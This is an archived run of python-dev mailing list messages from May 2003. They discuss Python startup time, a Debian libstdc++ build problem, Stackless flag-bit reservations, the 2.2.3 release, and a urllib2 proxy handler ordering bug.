In-Reply-To: <000001c31de1$322a0e90$6401a8c0@damien>
References: <LNBBLJKPBEHFEDALKOLCIEPHEFAB.tim.one@comcast.net>
 <000001c31de1$322a0e90$6401a8c0@damien>
Message-ID: <16072.59702.946136.830167@montanaro.dyndns.org>

    damien> Suggestions for more appropriate benchmarks are, as usual,
    damien> always welcome.

There's always Marc André Lemburg's pybench package.

Skip


From skip@pobox.com  Mon May 19 15:40:21 2003
From: skip@pobox.com (Skip Montanaro)
Date: Mon, 19 May 2003 09:40:21 -0500
Subject: [Python-Dev] Re: Using emacs' unexec to speed Python startup (was Re: [Python-Dev]
 Startup time)
In-Reply-To: <31A13D92-89FB-11D7-B165-003065EEFAC8@python.org>
References: <20030519120633.GA12073@unpythonic.net>
 <31A13D92-89FB-11D7-B165-003065EEFAC8@python.org>
Message-ID: <16072.60629.593925.7052@montanaro.dyndns.org>

    >> First off, I sure doubt that this feature could be truly made
    >> "non-experimental" before 2.3 is released.  There was one "strange
    >> bug" so far (the signal thing), though that was quickly solved (with
    >> another change to the core Python source code).

    Barry> Yeah, I was just tired and rambling after a long weekend. :)

On the other hand, I think it would be nice to check it into the sandbox if
it's not already there.  If licensing is an issue, just include a README
file which says, "Get thus-and-such from a recent Emacs (or XEmacs?)
distribution."

Skip



From lkcl@samba-tng.org  Mon May 19 15:57:55 2003
From: lkcl@samba-tng.org (Luke Kenneth Casson Leighton)
Date: Mon, 19 May 2003 14:57:55 +0000
Subject: [Python-Dev] [debian build error]
Message-ID: <20030519145755.GB25000@localhost>

there is at present a problem with python2.2 on debian, unstable dist.

there are dependency issues.

gcc 3.3 is now the latest for unstable.

gcc 3.3 contains a package libstdc++-5.

python2.2 is compiled with gcc 3.2.

installing the latest libstdc++-5, which is compiled with gcc 3.3,
causes python2.2 to complain:

/usr/lib/libgcc1_s.so.1 cannot find GCC_3.3 in libstdc++-5.

i thought you should know.

l.

p.s. it's not the only program affected by the broken libstdc++-5.

-- 
-- 
expecting email to be received and understood is a bit like
picking up the telephone and immediately dialing without
checking for a dial-tone; speaking immediately without listening
for either an answer or ring-tone; hanging up immediately and
then expecting someone to call you (and to be able to call you).
--
every day, people send out email expecting it to be received
without being tampered with, read by other people, delayed or
simply - without prejudice but lots of incompetence - destroyed.
--
please therefore treat email more like you would a CB radio
to communicate across the world (via relaying stations):
ask and expect people to confirm receipt; send nothing that
you don't mind everyone in the world knowing about...


From skip@pobox.com  Mon May 19 16:16:50 2003
From: skip@pobox.com (Skip Montanaro)
Date: Mon, 19 May 2003 10:16:50 -0500
Subject: [Python-Dev] [debian build error]
In-Reply-To: <20030519145755.GB25000@localhost>
References: <20030519145755.GB25000@localhost>
Message-ID: <16072.62818.314237.459419@montanaro.dyndns.org>

    Luke> gcc 3.3 is now the latest for unstable.

    Luke> gcc 3.3 contains a package libstdc++-5.

    Luke> python2.2 is compiled with gcc 3.2.

    Luke> installing the latest libstdc++-5, which is compiled with gcc 3.3,
    Luke> causes python2.2 to complain:

    Luke> /usr/lib/libgcc1_s.so.1 cannot find GCC_3.3 in libstdc++-5.

Is python2.2 compiled by you from source or is it a Debian-provided package?
If it was provided by Debian I think they'll have to be the ones to solve
the problem.

Skip


From Jack.Jansen@cwi.nl  Mon May 19 16:20:09 2003
From: Jack.Jansen@cwi.nl (Jack Jansen)
Date: Mon, 19 May 2003 17:20:09 +0200
Subject: [Python-Dev] Vacation; Python 2.2.3 release.
In-Reply-To: <200305160032.h4G0WJx17890@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <6097E7A8-8A0D-11D7-9DD7-0030655234CE@cwi.nl>

I seem to remember that there are one or two bugfixes assigned to me
that I thought fairly important for 2.2.3 at the time.  Unfortunately
sf.net is down at the moment, so I can't check this, and I don't
remember whether they were OSX-related (so they have to go into the
main release) or OS9-only (so they needn't hold up the main release).

I'll try to get around to these tomorrow.
--
Jack Jansen, <Jack.Jansen@cwi.nl>, http://www.cwi.nl/~jack
If I can't dance I don't want to be part of your revolution -- Emma 
Goldman



From jepler@unpythonic.net  Mon May 19 16:24:01 2003
From: jepler@unpythonic.net (Jeff Epler)
Date: Mon, 19 May 2003 10:24:01 -0500
Subject: Using emacs' unexec to speed Python startup (was Re: [Python-Dev] Startup time)
In-Reply-To: <16072.60629.593925.7052@montanaro.dyndns.org>
References: <20030519120633.GA12073@unpythonic.net> <31A13D92-89FB-11D7-B165-003065EEFAC8@python.org> <16072.60629.593925.7052@montanaro.dyndns.org>
Message-ID: <20030519152359.GA13673@unpythonic.net>

On Mon, May 19, 2003 at 09:40:21AM -0500, Skip Montanaro wrote:
> On the other hand, I think it would be nice to check it into the sandbox if
> it's not already there.  If licensing is an issue, just include a README
> file which says, "Get thus-and-such from a recent Emacs (or XEmacs?)
> distribution."

Sure, I think that could be a good idea.

How should the changes to core python be included?  Making 'import site'
happen when loading a dumped binary required another change.  I could
easily produce a diff for them.

Jeff


From skip@pobox.com  Mon May 19 16:39:33 2003
From: skip@pobox.com (Skip Montanaro)
Date: Mon, 19 May 2003 10:39:33 -0500
Subject: [Python-Dev] Re: Using emacs' unexec to speed Python startup (was Re: [Python-Dev]
 Startup time)
In-Reply-To: <20030519152359.GA13673@unpythonic.net>
References: <20030519120633.GA12073@unpythonic.net>
 <31A13D92-89FB-11D7-B165-003065EEFAC8@python.org>
 <16072.60629.593925.7052@montanaro.dyndns.org>
 <20030519152359.GA13673@unpythonic.net>
Message-ID: <16072.64181.575078.727768@montanaro.dyndns.org>

    Jeff> How should the changes to core python be included?  Making 'import
    Jeff> site' happen when loading a dumped binary required another change.
    Jeff> I could easily produce a diff for them.

For now a context diff will probably work.  Slightly longer term, if the
changes look promising but are somehow incompatible with other stuff (like
your mallopt call) I think they should be conditionally compiled and an
--enable-unexec flag added to configure.  (I assume none of this stuff will
work on Windows.)

Skip



From jepler@unpythonic.net  Mon May 19 16:48:48 2003
From: jepler@unpythonic.net (Jeff Epler)
Date: Mon, 19 May 2003 10:48:48 -0500
Subject: Using emacs' unexec to speed Python startup (was Re: [Python-Dev] Startup time)
In-Reply-To: <16072.64181.575078.727768@montanaro.dyndns.org>
References: <20030519120633.GA12073@unpythonic.net> <31A13D92-89FB-11D7-B165-003065EEFAC8@python.org> <16072.60629.593925.7052@montanaro.dyndns.org> <20030519152359.GA13673@unpythonic.net> <16072.64181.575078.727768@montanaro.dyndns.org>
Message-ID: <20030519154848.GD13673@unpythonic.net>

On Mon, May 19, 2003 at 10:39:33AM -0500, Skip Montanaro wrote:
> I assume none of this stuff will work on Windows.

there *is* a "unexnt.c" in xemacs, and "unexw32.c" in emacs.  I don't have
the ability to try them, but in theory they would work in the same way.

jeff


From pedronis@bluewin.ch  Mon May 19 17:07:08 2003
From: pedronis@bluewin.ch (Samuele Pedroni)
Date: Mon, 19 May 2003 18:07:08 +0200
Subject: [Python-Dev] [PEP] += on return of function call result
In-Reply-To: <20030519125317.GC737@localhost>
References: <20030517152137.GA25579@unpythonic.net>
 <20030402090726.GN1048@localhost>
 <yu99n0j9gdas.fsf@europa.research.att.com>
 <20030515214417.GF3900@localhost>
 <yu99vfwbf62s.fsf@europa.research.att.com>
 <20030516142451.GI6196@localhost>
 <20030517152137.GA25579@unpythonic.net>
Message-ID: <5.2.1.1.0.20030519180035.0242bcd0@localhost>

At 12:53 19.05.2003 +0000, Luke Kenneth Casson Leighton wrote:
>jeff,
>
>beat bolli's code example:
>
>         count[word] = count.get(word, 0) + 1
>
>i think best illustrates what issue you are trying to raise.
>
>okay, we know there are two issues so let's give an example
>that removes one of those issues:
>
>         count = {}
>
>         count[word] = count.get(word, []) + ['hello']
>
>the issue is that the difference between the above 'hello'
>example and this:
>
>         count.get(word, []) += ['hello']
>
>is that you don't know what STORE to use after the use of get()
>in the second example, but you do in the first example because
>it's explicity set out.
>
>so, does this help illustrate what might be done?
>
>if it's possible to return a result and know what should be done
>with it, then surely it should be possible to return a result from
>a += "function" and know what should be done with it?
>
>l.


 >>> def refiadd(r,v): # r+=v, r is a reference, not an lvalue
...   if hasattr(r.__class__,'__iadd__'):
...     r.__class__.__iadd__(r,v)
...   else:
...     raise ValueError,"non-sense"
...
 >>> greetings={}
 >>> refiadd(greetings.setdefault('susy',[]),['hello'])  # greetings.setdefault('susy',[]) += ['hello']
 >>> refiadd(greetings.setdefault('susy',[]),['!'])      # greetings.setdefault('susy',[]) += ['!']
 >>> greetings
{'susy': ['hello', '!']}
 >>> refiadd(greetings.setdefault('betty',1),1)          # greetings.setdefault('betty',1) += 1
Traceback (most recent call last):
   File "<stdin>", line 1, in ?
   File "<stdin>", line 5, in refiadd
ValueError: non-sense

regards. 



From lkcl@samba-tng.org  Mon May 19 17:31:20 2003
From: lkcl@samba-tng.org (Luke Kenneth Casson Leighton)
Date: Mon, 19 May 2003 16:31:20 +0000
Subject: [Python-Dev] [PEP] += on return of function call result
In-Reply-To: <5.2.1.1.0.20030519180035.0242bcd0@localhost>
References: <20030517152137.GA25579@unpythonic.net> <20030402090726.GN1048@localhost> <yu99n0j9gdas.fsf@europa.research.att.com> <20030515214417.GF3900@localhost> <yu99vfwbf62s.fsf@europa.research.att.com> <20030516142451.GI6196@localhost> <20030517152137.GA25579@unpythonic.net> <5.2.1.1.0.20030519180035.0242bcd0@localhost>
Message-ID: <20030519163120.GB26355@localhost>

On Mon, May 19, 2003 at 06:07:08PM +0200, Samuele Pedroni wrote:

> >>> def refiadd(r,v): # r+=v, r is a reference, not an lvalue
> ...   if hasattr(r.__class__,'__iadd__'):
> ...     r.__class__.__iadd__(r,v)
> ...   else:
> ...     raise ValueError,"non-sense"
> ...

you're a star - thank you!



From lkcl@samba-tng.org  Mon May 19 17:32:48 2003
From: lkcl@samba-tng.org (Luke Kenneth Casson Leighton)
Date: Mon, 19 May 2003 16:32:48 +0000
Subject: [Python-Dev] [debian build error]
In-Reply-To: <16072.62818.314237.459419@montanaro.dyndns.org>
References: <20030519145755.GB25000@localhost> <16072.62818.314237.459419@montanaro.dyndns.org>
Message-ID: <20030519163247.GD26355@localhost>

On Mon, May 19, 2003 at 10:16:50AM -0500, Skip Montanaro wrote:
> 
>     Luke> gcc 3.3 is now the latest for unstable.
> 
>     Luke> gcc 3.3 contains a package libstdc++-5.
> 
>     Luke> python2.2 is compiled with gcc 3.2.
> 
>     Luke> installing the latest libstdc++-5, which is compiled with gcc 3.3,
>     Luke> causes python2.2 to complain:
> 
>     Luke> /usr/lib/libgcc1_s.so.1 cannot find GCC_3.3 in libstdc++-5.
> 
> Is python2.2 compiled by you from source or is it a Debian-provided package?
 
 debian-provided.  i've actually had to remove gcc altogether in order
 to solve the problem (!!!)

 l.



From tismer@tismer.com  Mon May 19 19:12:48 2003
From: tismer@tismer.com (Christian Tismer)
Date: Mon, 19 May 2003 20:12:48 +0200
Subject: [Python-Dev] Need advice, maybe support
In-Reply-To: <200305182104.h4IL4eY17830@pcp02138704pcs.reston01.va.comcast.net>
References: <3EC579B4.9000303@tismer.com> <200305182104.h4IL4eY17830@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <3EC91EA0.5090105@tismer.com>

Guido van Rossum wrote:

[me, about how to add _nr cfunction versions in a compatible way]

> I don't think we can just add an extra field to PyMethodDef, because
> it would break binary compatibility.  Currently, in most cases, a
> 3rd party extension module compiled for an earlier Python version can
> still be used with a later version.  Because PyMethodDef is used as an
> array, adding a field to it would break this.

Bad news. I hoped you would break binary compatibility between
major versions (like from 2.2 to 2.3), but well, now I also
understand why there are so many flags in typeobjects :-)

> I have less of a problem with extending PyTypeObject, it grows all the
> time and the tp_flags bits tell you how large the one you've got is.
> (I still have some problems with this, because things that are of no
> use to the regular Python core developers tend to either confuse them,
> or be broken on a regular basis.)

For the typeobjects, I'm simply asking for reservation
of a bit number. What I used is

#ifdef STACKLESS
#define Py_TPFLAGS_HAVE_CALL_NR (1L<<15)
#else
#define Py_TPFLAGS_HAVE_CALL_NR 0
#endif

but I think nobody needs to know about this, and maybe
it is better (requiring no change of Python) if I used
a bit from the higher end (31) or such?

> Maybe you could get away with defining an alternative structure for
> PyMethodDef and having a flag in tp_flags say which it is; there are
> plenty of unused bits and I don't mind reserving one for you.  Then
> you'd have to change all the code that *uses* tp_methods, but there
> isn't much of that; in fact, the only place I see is in typeobject.c.

The problem is that I need to give extra semantics to
existing objects, which are PyCFunction objects.
I think putting an extra bit into the type object
doesn't help, unless I use a new type. But then I don't
need the flag.
An old extension module which is loaded into my Python
will always use my PyCFunction, since this is always
borrowed.

> If this doesn't work for you, maybe you could somehow fold the two
> implementation functions into one, and put something special in the
> argument list to signal that the non-recursive version is wanted?
> (Thinking aloud here -- I don't know exactly what the usage pattern of
> the nr versions will be.)

This is hard to do. I'm adding _nr versions to existing
functions, and I don't want to break their parameter lists.


Ok, what I did is rather efficient, quite a bit ugly of
course, but binary compatible as much as possible.
It required to steal some bits of ml_flags as a small
integer, which are interpreted as "distance to my sibling".
I'm extending the MethodDef arrays in a special way
by just adding some extra records without name fields
at the end of the array, which hold the _nr pointers.

An initialization function initializes the small integer
in ml_flags with the distance to this "sibling", and
the nice thing about this is that it will never fail
if not initialized:
A distance of zero gives just the same record.
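
In code the idea is roughly this (just a sketch -- the names and the
bit positions are illustrative, not what I'm actually checking in):

    /* a few high bits of ml_flags hold the distance, in array slots, from
       a PyMethodDef record to its _nr sibling appended after the table */
    #define ML_SIBLING_SHIFT  24
    #define ML_SIBLING_MASK   (0xffU << ML_SIBLING_SHIFT)

    static PyMethodDef *
    ml_nr_sibling(PyMethodDef *ml)
    {
        unsigned int dist =
            ((unsigned int)ml->ml_flags & ML_SIBLING_MASK) >> ML_SIBLING_SHIFT;
        return ml + dist;   /* distance 0 (uninitialised) is the record itself */
    }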

So what I'm asking for in this case is a small number
of bits of the ml_flags word which will not be used,
otherwise.

Do you think the number of bits in ml_flags might ever
grow beyond 16, or should I just assume that I can
safely abuse them?

thanks a lot -- chris

-- 
Christian Tismer             :^)   <mailto:tismer@tismer.com>
Mission Impossible 5oftware  :     Have a break! Take a ride on Python's
Johannes-Niemeyer-Weg 9a     :    *Starship* http://starship.python.net/
14109 Berlin                 :     PGP key -> http://wwwkeys.pgp.net/
work +49 30 89 09 53 34  home +49 30 802 86 56  pager +49 173 24 18 776
PGP 0x57F3BF04       9064 F4E1 D754 C2FF 1619  305B C09C 5A3B 57F3 BF04
      whom do you want to sponsor today?   http://www.stackless.com/



From martin@v.loewis.de  Mon May 19 21:10:45 2003
From: martin@v.loewis.de (Martin v. Löwis)
Date: 19 May 2003 22:10:45 +0200
Subject: [Python-Dev] Need advice, maybe support
In-Reply-To: <3EC91EA0.5090105@tismer.com>
References: <3EC579B4.9000303@tismer.com>
 <200305182104.h4IL4eY17830@pcp02138704pcs.reston01.va.comcast.net>
 <3EC91EA0.5090105@tismer.com>
Message-ID: <m3ptmehf3u.fsf@mira.informatik.hu-berlin.de>

Christian Tismer <tismer@tismer.com> writes:

> The problem is that I need to give extra semantics to existing
> objects, which are PyCFunction objects.  I think putting an extra
> bit into the type object doesn't help, unless I use a new type. But
> then I don't need the flag.  An old extension module which is loaded
> into my Python will always use my PyCFunction, since this is always
> borrowed.

I understand the concern is not about changing PyCFunction, but about
changing PyMethodDef, which would get another field.

I think you can avoid adding a field to PyMethodDef, by providing a
PyMethodDefEx structure, which has the extra field, and is referred-to
from (a new slot in) the type object. The slots in the type object
that refer to PyMethodDefs would either get set to NULL, or
initialized with a copy of the PyMethodDefEx with the extra field
removed.
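
Something like this, in other words (a sketch only; PyMethodDefEx as
written here is just illustrative, not an existing CPython structure):

    typedef struct PyMethodDefEx {
        char        *ml_name;
        PyCFunction  ml_meth;
        int          ml_flags;
        char        *ml_doc;
        PyCFunction  ml_meth_nr;   /* extra slot, e.g. the non-recursive version */
    } PyMethodDefEx;

Extension modules compiled against the old headers keep using plain
PyMethodDef arrays and simply never see the new slot.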

Regards,
Martin


From guido@python.org  Mon May 19 21:33:32 2003
From: guido@python.org (Guido van Rossum)
Date: Mon, 19 May 2003 16:33:32 -0400
Subject: [Python-Dev] a strange case
In-Reply-To: "Your message of Mon, 19 May 2003 00:19:18 +0200."
 <3EC806E6.3040204@livinglogic.de>
References: <20030516202402.30333.72761.Mailman@mail.python.org>
 <200305161345.25415.troy@gci.net>
 <200305182042.h4IKgYA17778@pcp02138704pcs.reston01.va.comcast.net>
 <3EC806E6.3040204@livinglogic.de>
Message-ID: <200305192033.h4JKXWe19538@pcp02138704pcs.reston01.va.comcast.net>

> But reload() won't work for these pseudo modules (See
> http://www.python.org/sf/701743).

Reload() is a hack that doesn't really work except in the most simple
cases.  This isn't one of those.

> What about the imp module?

Yes, what about it?  (I don't understand the remark.)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@python.org  Mon May 19 21:47:39 2003
From: guido@python.org (Guido van Rossum)
Date: Mon, 19 May 2003 16:47:39 -0400
Subject: [Python-Dev] Need advice, maybe support
In-Reply-To: "Your message of Mon, 19 May 2003 20:12:48 +0200."
 <3EC91EA0.5090105@tismer.com>
References: <3EC579B4.9000303@tismer.com>
 <200305182104.h4IL4eY17830@pcp02138704pcs.reston01.va.comcast.net>
 <3EC91EA0.5090105@tismer.com>
Message-ID: <200305192047.h4JKldW19641@pcp02138704pcs.reston01.va.comcast.net>

> Guido van Rossum wrote:
> 
> [me, about how to add _nr cfunction versions in a compatible way]
> 
> > I don't think we can just add an extra field to PyMethodDef, because
> > it would break binary compatibility.  Currently, in most cases, a
> > 3rd party extension module compiled for an earlier Python version can
> > still be used with a later version.  Because PyMethodDef is used as an
> > array, adding a field to it would break this.
> 
> Bad news. I hoped you would break binary compatibility between
> major versions (like from 2.2 to 2.3), but well, now I also
> understand why there are so many flags in typeobjects :-)
> 
> > I have less of a problem with extending PyTypeObject, it grows all the
> > time and the tp_flags bits tell you how large the one you've got is.
> > (I still have some problems with this, because things that are of no
> > use to the regular Python core developers tend to either confuse them,
> > or be broken on a regular basis.)
> 
> For the typeobjects, I'm simply asking for reservation
> of a bit number. What I used is
> 
> #ifdef STACKLESS
> #define Py_TPFLAGS_HAVE_CALL_NR (1L<<15)
> #else
> #define Py_TPFLAGS_HAVE_CALL_NR 0
> #endif
> 
> but I think nobody needs to know about this, and maybe
> it is better (requiring no change of Python) if I used
> a bit from the higher end (31) or such?
> 
> > Maybe you could get away with defining an alternative structure for
> > PyMethodDef and having a flag in tp_flags say which it is; there are
> > plenty of unused bits and I don't mind reserving one for you.  Then
> > you'd have to change all the code that *uses* tp_methods, but there
> > isn't much of that; in fact, the only place I see is in typeobject.c.
> 
> The problem is that I need to give extra semantics to
> existing objects, which are PyCFunction objects.
> I think putting an extra bit into the type object
> doesn't help, unless I use a new type. But then I don't
> need the flag.
> An old extension module which is loaded into my Python
> will always use my PyCFunction, since this is always
> borrowed.
> 
> > If this doesn't work for you, maybe you could somehow fold the two
> > implementation functions into one, and put something special in the
> > argument list to signal that the non-recursive version is wanted?
> > (Thinking aloud here -- I don't know exactly what the usage pattern of
> > the nr versions will be.)
> 
> This is hard to do. I'm adding _nr versions to existing
> functions, and I don't want to break their parameter lists.
> 
> 
> Ok, what I did is rather efficient, quite a bit ugly of
> course, but binary compatible as much as possible.
> It required to steal some bits of ml_flags as a small
> integer, which are interpreted as "distance to my sibling".
> I'm extending the MethodDef arrays in a special way
> by just adding some extra records without name fields
> at the end of the array, which hold the _nr pointers.
> 
> An initialization function initializes the small integer
> in ml_flags with the distance to this "sibling", and
> the nice thing about this is that it will never fail
> if not initialized:
> A distance of zero gives just the same record.
> 
> So what I'm asking for in this case is a small number
> of bits of the ml_flags word which will not be used,
> otherwise.
> 
> Do you think the number of bits in ml_flags might ever
> grow beyond 16, or should I just assume that I can
> safely abuse them?
> 
> thanks a lot -- chris

It's better to reserve bits explicitly.  Can you submit a patch to SF
that makes reservations of the bits you need?  All they need is a
definition of a symbol and a comment explaining what it is for;
"reserved for Stackless" is fine.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From doko@cs.tu-berlin.de  Mon May 19 22:13:05 2003
From: doko@cs.tu-berlin.de (Matthias Klose)
Date: Mon, 19 May 2003 23:13:05 +0200
Subject: [Python-Dev] Vacation; Python 2.2.3 release.
In-Reply-To: <1053050696.26479.35.camel@geddy>
References: <200305160032.h4G0WJx17890@pcp02138704pcs.reston01.va.comcast.net>
 <1053050696.26479.35.camel@geddy>
Message-ID: <16073.18657.581177.570701@gargle.gargle.HOWL>

Barry Warsaw writes:
> FWIW, I'm going to be around, and am fairly free during the US Memorial
> Day weekend 24th - 26th.  Can we shoot for getting a release out that
> weekend?  If we can code freeze by the 22nd, I can throw together a
> release candidate on Friday (with Tim's help for Windows) and a final by
> Monday.

I'd like to see the following patches included, they are in HEAD and
currently applied in the python2.2 Debian packages, so they got some
testing.

- Send anonymous password when using anonftp
  Lib/ftplib.py 1.62 1.63
  See http://python.org/sf/497420

- robotparser.py fails on some URLs (including change of copyright
  from "Python 2.0 open source license").
  See http://python.org/sf/499513

- make tkinter compatible with tk-8.4.2.
  See http://python.org/sf/707701

	Matthias


From tismer@tismer.com  Mon May 19 22:20:18 2003
From: tismer@tismer.com (Christian Tismer)
Date: Mon, 19 May 2003 23:20:18 +0200
Subject: [Python-Dev] Need advice, maybe support
In-Reply-To: <200305192047.h4JKldW19641@pcp02138704pcs.reston01.va.comcast.net>
References: <3EC579B4.9000303@tismer.com> <200305182104.h4IL4eY17830@pcp02138704pcs.reston01.va.comcast.net> <3EC91EA0.5090105@tismer.com> <200305192047.h4JKldW19641@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <3EC94A92.2040604@tismer.com>

Guido van Rossum wrote:

...

>>Do you think the number of bits in ml_flags might ever
>>grow beyond 16, or should I just assume that I can
>>safely abuse them?
>>
>>thanks a lot -- chris
> 
> 
> It's better to reserve bits explicitly.  Can you submit a patch to SF
> that makes reservations of the bits you need?  All they need is a
> definition of a symbol and a comment explaining what it is for;
> "reserved for Stackless" is fine.

Ok, what I'm asking for is:
"please reserve one bit for me in tp->flags" (31 preferred) and
"please reserve 8 bits for me in ml->flags" (24-31 preferred).
The latter will also not degrade performance, since
these bits shalt simply not be used, but if STACKLESS isn't
defined, there is no need to mask these bits off.
I also will name these fields in a way that makes it obvious
for everybody that they better should not touch these.

Iff you agree, I'm going to submit my patch now, and my thanks
will follow you for the rest of the subset of our lives. :)

sincerely -- chris

-- 
Christian Tismer             :^)   <mailto:tismer@tismer.com>
Mission Impossible 5oftware  :     Have a break! Take a ride on Python's
Johannes-Niemeyer-Weg 9a     :    *Starship* http://starship.python.net/
14109 Berlin                 :     PGP key -> http://wwwkeys.pgp.net/
work +49 30 89 09 53 34  home +49 30 802 86 56  pager +49 173 24 18 776
PGP 0x57F3BF04       9064 F4E1 D754 C2FF 1619  305B C09C 5A3B 57F3 BF04
      whom do you want to sponsor today?   http://www.stackless.com/




From cnetzer@mail.arc.nasa.gov  Mon May 19 22:25:57 2003
From: cnetzer@mail.arc.nasa.gov (Chad Netzer)
Date: 19 May 2003 14:25:57 -0700
Subject: [Python-Dev] Vacation; Python 2.2.3 release.
In-Reply-To: <16073.18657.581177.570701@gargle.gargle.HOWL>
References: <200305160032.h4G0WJx17890@pcp02138704pcs.reston01.va.comcast.net>
 <1053050696.26479.35.camel@geddy>
 <16073.18657.581177.570701@gargle.gargle.HOWL>
Message-ID: <1053379556.533.74.camel@sayge.arc.nasa.gov>

On Mon, 2003-05-19 at 14:13, Matthias Klose wrote:

> I'd like to see the following patches included, they are in HEAD and
> currently applied in the python2.2 Debian packages, so they got some
> testing.

> - make tkinter compatible with tk-8.4.2.
>   See http://python.org/sf/707701

Don't know about the others, but this one at least seems to have been
applied.

Chad




From niemeyer@conectiva.com  Mon May 19 22:28:08 2003
From: niemeyer@conectiva.com (Gustavo Niemeyer)
Date: Mon, 19 May 2003 18:28:08 -0300
Subject: [Python-Dev] urllib2 proxy support broken?
Message-ID: <20030519212807.GA29002@ibook.distro.conectiva>

I've just tried to use the proxy support in urllib2, and was surprised
by the fact that it seems to be broken, at least in 2.2 and 2.3. Can
somebody please confirm that it's really broken, so that I can prepare
a patch?

If I understood it correctly, that's how the proxy support is supposed
to work:

    import urllib2
    proxy_support = urllib2.ProxyHandler({"http":"http://ahad-haam:3128"})
    opener = urllib2.build_opener(proxy_support)
    urllib2.install_opener(opener)
    f = urllib2.urlopen('http://www.python.org/')

OTOH, code in build_opener() does this:

    # Remove default handler if a custom handler was provided
    for klass in default_classes:
        for check in handlers:
            if inspect.isclass(check):
                if issubclass(check, klass):
                    skip.append(klass)
            elif isinstance(check, klass):
                skip.append(klass)
    for klass in skip:
        default_classes.remove(klass)

    # Instantiate default handler and append them
    for klass in default_classes:
        opener.add_handler(klass())

    # Instantiate custom handler and append them
    for h in handlers:
        if inspect.isclass(h):
            h = h() 
        opener.add_handler(h)


Notice that default handlers are added *before* custom handlers, so
HTTPHandler.http_open() ends up being called before
ProxyHandler.http_open(), and the latter never gets a chance to run.

To make the first snippet work, one would have to use the unobvious
version:

    import urllib2
    proxy_support = urllib2.ProxyHandler({"http":"http://ahad-haam:3128"})
    http_support = urllib2.HTTPHandler()
    opener = urllib2.build_opener(proxy_support, http_support)
    urllib2.install_opener(opener)
    f = urllib2.urlopen('http://www.python.org/')
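
Alternatively, build_opener() could register the custom handlers before
the default ones; a sketch of the reordering, based on the code above
and completely untested:

    # Instantiate custom handlers first, so e.g. ProxyHandler.http_open()
    # gets a chance before HTTPHandler.http_open()
    for h in handlers:
        if inspect.isclass(h):
            h = h()
        opener.add_handler(h)

    # Then instantiate and append the remaining default handlers
    for klass in default_classes:
        opener.add_handler(klass())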

Is this really broken, or perhaps it's a known "feature" which should be
left as is to avoid side effects (and I should patch the documentation
instead)?

-- 
Gustavo Niemeyer

[ 2AAC 7928 0FBF 0299 5EB5  60E2 2253 B29A 6664 3A0C ]


From guido@python.org  Mon May 19 22:36:24 2003
From: guido@python.org (Guido van Rossum)
Date: Mon, 19 May 2003 17:36:24 -0400
Subject: [Python-Dev] Need advice, maybe support
In-Reply-To: "Your message of Mon, 19 May 2003 23:20:18 +0200."
 <3EC94A92.2040604@tismer.com>
References: <3EC579B4.9000303@tismer.com>
 <200305182104.h4IL4eY17830@pcp02138704pcs.reston01.va.comcast.net>
 <3EC91EA0.5090105@tismer.com>
 <200305192047.h4JKldW19641@pcp02138704pcs.reston01.va.comcast.net>
 <3EC94A92.2040604@tismer.com>
Message-ID: <200305192136.h4JLaOX20032@pcp02138704pcs.reston01.va.comcast.net>

> > It's better to reserve bits explicitly.  Can you submit a patch to SF
> > that makes reservations of the bits you need?  All they need is a
> > definition of a symbol and a comment explaining what it is for;
> > "reserved for Stackless" is fine.
> 
> Ok, what I'm asking for is:
> "please reserve one bit for me in tp->flags" (31 preferred) and
> "please reserve 8 bits for me in ml->flags" (24-31 preferred).
> The latter will also not degrade performance, since
> these bits shalt simply not be used, but if STACKLESS isn't
> defined, there is no need to mask these bits off.
> I also will name these fields in a way that makes it obvious
> for everybody that they better should not touch these.
> 
> Iff you agree, I'm going to submit my patch now, and my thanks
> will follow you for the rest of the subset of our lives. :)

+1

--Guido van Rossum (home page: http://www.python.org/~guido/)


From doko@cs.tu-berlin.de  Mon May 19 22:31:47 2003
From: doko@cs.tu-berlin.de (Matthias Klose)
Date: Mon, 19 May 2003 23:31:47 +0200
Subject: [Python-Dev] Vacation; Python 2.2.3 release.
In-Reply-To: <16073.18657.581177.570701@gargle.gargle.HOWL>
References: <200305160032.h4G0WJx17890@pcp02138704pcs.reston01.va.comcast.net>
 <1053050696.26479.35.camel@geddy>
 <16073.18657.581177.570701@gargle.gargle.HOWL>
Message-ID: <16073.19779.115820.624940@gargle.gargle.HOWL>

Matthias Klose writes:
> Barry Warsaw writes:
> > FWIW, I'm going to be around, and am fairly free during the US Memorial
> > Day weekend 24th - 26th.  Can we shoot for getting a release out that
> > weekend?  If we can code freeze by the 22nd, I can throw together a
> > release candidate on Friday (with Tim's help for Windows) and a final by
> > Monday.
> 
> I'd like to see the following patches included, they are in HEAD and
> currently applied in the python2.2 Debian packages, so they got some
> testing.

> - make tkinter compatible with tk-8.4.2.
>   See http://python.org/sf/707701

oops, sorry this one is already applied.


From tismer@tismer.com  Mon May 19 23:09:14 2003
From: tismer@tismer.com (Christian Tismer)
Date: Tue, 20 May 2003 00:09:14 +0200
Subject: [Python-Dev] Need advice, maybe support
In-Reply-To: <m3ptmehf3u.fsf@mira.informatik.hu-berlin.de>
References: <3EC579B4.9000303@tismer.com>	<200305182104.h4IL4eY17830@pcp02138704pcs.reston01.va.comcast.net>	<3EC91EA0.5090105@tismer.com> <m3ptmehf3u.fsf@mira.informatik.hu-berlin.de>
Message-ID: <3EC9560A.9070602@tismer.com>

Lieber Martin,

> Christian Tismer <tismer@tismer.com> writes:
> 
> 
>>The problem is that I need to give extra semantics to existing
>>objects, which are PyCFunction objects.  I think putting an extra
>>bit into the type object doesn't help, unless I use a new type. But
>>then I don't need the flag.  An old extension module which is loaded
>>into my Python will always use my PyCFunction, since this is always
>>borrowed.
> 
> 
> I understand the concern is not about changing PyCFunction, but about
> changing PyMethodDef, which would get another field.

Exactly. This is the static structure which is lingering around in
many old extension modules, and to change it would require massive
recompilation.

> I think you can avoid adding a field to PyMethodDef, by providing a
> PyMethodDefEx structure, which has the extra field, and is referred-to
> from (a new slot in) the type object. The slots in the type object
> that refer to PyMethodDefs would either get set to NULL, or
> initialized with a copy of the PyMethodDefEx with the extra field
> removed.

Hey, that's really not bad!

Today, I've banged my head on my desk many times, trying to
find out how to turn a clean, new approach into the least
hackish surrogate, which is binary compatible.
Well, I found some, not really pretty but working.
It uses not an extra field, but extra records, which are
used as sibling fields, past the end of the method table.

I have to think about what implementation is more efficient,
